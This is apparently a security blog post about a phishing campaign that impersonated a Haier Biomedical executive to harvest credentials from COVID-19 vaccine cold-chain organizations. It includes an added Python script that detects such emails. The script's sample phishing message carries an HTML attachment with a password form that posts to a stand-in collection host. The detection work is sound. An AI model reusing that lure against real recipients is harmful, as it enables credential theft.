COVID-19 vaccines must be kept cold from manufacture until they are administered to patients. The cold chain that makes this possible is still struggling with distribution at scale, and that strain creates openings for attackers who want to disrupt or profit from vaccine distribution. This post looks at the most recent phishing campaign aimed at the COVID-19 cold chain.
Who is at Risk
According to the Cybersecurity and Infrastructure Security Agency (CISA), threat actors are positioning themselves to target the cold chain and transportation of the coronavirus vaccine. The agency notes that the phishing campaign targets agencies and organizations supporting the Cold Chain Equipment Optimization Platform (CCEOP).
The attackers are seeking a foothold inside enterprises that make up the cold chain network. If they succeed, the intrusion could expose sensitive information held by these organizations.
For example, a cyberattack likely involving ransomware has targeted Americold Realty Trust, an Atlanta-based cold storage company. These kinds of attacks can cause significant disruptions to the vaccine supply chain, leading to public health and economic consequences.
In December, IBM reported on a highly targeted attack on the cold chain. The campaign began with spoofed emails impersonating an executive at Haier Biomedical, a vaccine cold-chain equipment provider. The emails went to executives likely to be involved in the vaccine cold chain, in sales, procurement, IT, and finance. The campaign also targeted the help and support pages of some cold chain organizations.
According to IBM, the attack could have been an attempt to gather credentials that would allow the attackers to gain future access to the network and sensitive information about the COVID-19 cold chain.
The phishing emails posed as requests for quotation related to the Cold Chain Equipment Optimization Platform. They carried attachments that prompted recipients to enter their credentials before the content would display, a classic credential-harvesting lure dressed up as a business document.
A campaign like this, if successful, can go undetected for a long time and expose the affected organizations to large-scale data breaches. Harvested credentials also give the attackers a base for extended cyber espionage and leave a door open for future access to sensitive cold-chain information.
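The lure described above combines several signals that a mail gateway or analyst can check mechanically: a display name that claims a known partner while the sending domain does not belong to that partner, a Reply-To that routes responses elsewhere, failed sender authentication, and an attachment that contains a login form. The following Python script is an added example, not code from the original article or from IBM's report, and it triages a single raw email for exactly those patterns. The partner allowlist (`TRUSTED_PARTNERS`), the `.example` domains and both sample messages are constructed for the demonstration; IBM's actual indicators are not reproduced here.

```python
"""Heuristic triage of a suspected cold-chain phishing email.

Added example (not from the original article or from IBM's report). It parses
an RFC 5322 message with the standard library and flags the patterns the
campaign is described as using: a spoofed executive display name for a known
partner, a reply path that differs from the sender, failed sender
authentication, and an attachment that asks for credentials before showing
content. The partner list and the sample messages are constructed for the demo.
"""
import email
import email.policy
import re
from email.utils import parseaddr

# Hypothetical allowlist: brand keyword -> domains that partner legitimately
# sends from. A real deployment would load this from a vetted vendor directory.
TRUSTED_PARTNERS = {
    "haier": {"haierbiomedical.example"},
}


def _domain(addr: str) -> str:
    """Return the lower-cased domain of an email address, or '' if malformed."""
    _, address = parseaddr(addr)
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def analyze_message(raw: str, partners=TRUSTED_PARTNERS) -> list[str]:
    """Return a list of human-readable findings for one raw email (empty if clean)."""
    msg = email.message_from_string(raw, policy=email.policy.default)
    findings = []

    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(from_addr)

    # 1. Display-name impersonation: the name claims a partner brand, but the
    #    sending domain is not one that partner is known to use.
    for brand, domains in partners.items():
        if brand in display_name.lower() and from_domain not in domains:
            findings.append(f"display name claims {brand!r} but sender domain is {from_domain!r}")

    # 2. Reply-To pointing at a different domain than From, so replies (and
    #    any quotation data) go to infrastructure the attacker controls.
    reply_domain = _domain(msg.get("Reply-To", ""))
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain!r} differs from From domain {from_domain!r}")

    # 3. Sender authentication results recorded by the receiving MTA.
    auth = " ".join(msg.get_all("Authentication-Results", [])).lower()
    for mech in ("spf", "dkim", "dmarc"):
        if re.search(rf"\b{mech}=(fail|softfail|permerror)", auth):
            findings.append(f"{mech} failed")

    # 4. Attachments that carry a login form: the credential-gated lure.
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        if part.get_content_type() in ("text/html", "application/octet-stream"):
            body = part.get_content()
            if isinstance(body, bytes):
                body = body.decode("utf-8", "replace")
            if re.search(r'<input[^>]+type=["\']?password', body, re.I):
                findings.append(f"attachment {name!r} contains a password form")

    return findings


# Constructed sample: spoofed partner display name, divergent Reply-To,
# failed SPF/DMARC, and an HTML attachment with a password field.
SAMPLE_PHISH = """\
From: "Haier Biomedical Sales Director" <sales@haier-biomed-export.example>
Reply-To: quotes@mail-relay.example
To: procurement@coldchainco.example
Subject: RFQ: CCEOP vaccine cold storage units
Authentication-Results: mx.coldchainco.example; spf=fail smtp.mailfrom=haier-biomed-export.example; dmarc=fail
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached quotation request. Sign in to view the document.
--b1
Content-Type: text/html; name="RFQ-2020.html"
Content-Disposition: attachment; filename="RFQ-2020.html"

<html><body><form action="https://collect.example/post"><input name="user"><input type="password" name="pass"></form></body></html>
--b1--
"""

# Constructed sample of a clean message from the allowlisted partner domain.
SAMPLE_LEGIT = """\
From: "Haier Biomedical Sales" <sales@haierbiomedical.example>
To: procurement@coldchainco.example
Subject: Quotation follow-up
Authentication-Results: mx.coldchainco.example; spf=pass; dkim=pass; dmarc=pass
Content-Type: text/plain

The quotation follows under separate cover.
"""

if __name__ == "__main__":
    for label, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(label, analyze_message(sample))
```

None of these checks alone is conclusive: a legitimate vendor may send from a marketing domain, and a misconfigured SPF record fails for honest senders too. The value is in the combination, and in the fourth check, which catches the credential-gated attachment regardless of how well the sender details were forged.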
The Entity behind the Attack
The nature of the attack points to a nation-state. The targeting was very precise, and an individual would lack both the motivation and the resources to run a campaign of this scope.
The attack targeted key components and participants in the vaccine cold chain including:
- The European Commission's Directorate-General for Taxation and Customs Union (DG TAXUD), whose compromise would expose high-value targets in and beyond the EU
- Manufacturers of solar panels, which power vaccine refrigerators in areas without reliable electricity. Compromising these companies could enable theft of intellectual property and, downstream, a black market in stolen vaccine shipping equipment.
An individual with insight into the vaccine supply chain could sell it on the black market. The same information is worth far more to a nation-state, which stands to benefit economically and strategically.
Safeguarding the Cold Chain
Companies and organizations in the COVID-19 cold chain must remain vigilant so that they do not fall victim to phishing campaigns like this one, and they should keep up with recommended best practices. Key recommendations include:
- Creating and testing incident response plans
- Participating in threat intelligence sharing initiatives
- Assessing the risks introduced by third-party partnerships
- Enforcing multi-factor authentication across the organization